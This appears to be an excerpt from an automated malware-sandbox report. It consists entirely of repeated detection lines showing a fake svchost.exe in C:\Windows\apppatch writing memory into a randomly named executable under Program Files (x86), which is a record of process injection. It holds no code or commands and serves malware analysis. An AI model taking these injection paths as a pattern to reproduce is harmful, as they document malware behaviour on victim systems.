    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 900000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 901000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 902000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 955000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2635000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2960000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2961000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2962000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2220000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2221000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2222000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2275000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: BF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: C45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2BE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 760000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 761000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 762000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 7B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 10C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1115000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2945000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2560000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2561000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2562000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2FF2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3045000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2540000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2541000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2542000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2595000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 8D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 925000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2810000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2811000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2812000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2865000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 11D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1225000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1400000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1401000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1402000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1455000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: AC2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: B15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 14F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 1545000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2935000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2E82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2ED5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 23E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2435000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 930000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 931000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 932000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 985000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 25C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2615000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2330000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2331000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2332000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2385000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D90000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D91000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D92000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DE5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F20000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F21000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F22000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2F75000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2880000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2881000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2882000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 28D5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 29C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2A15000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2C72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2CC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D60000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D61000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2D62000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2DB5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F80000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F81000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: F82000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: FD5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2AE2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2B35000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 30E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 3135000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2740000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2741000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exe base: 2742000Jump to behavior
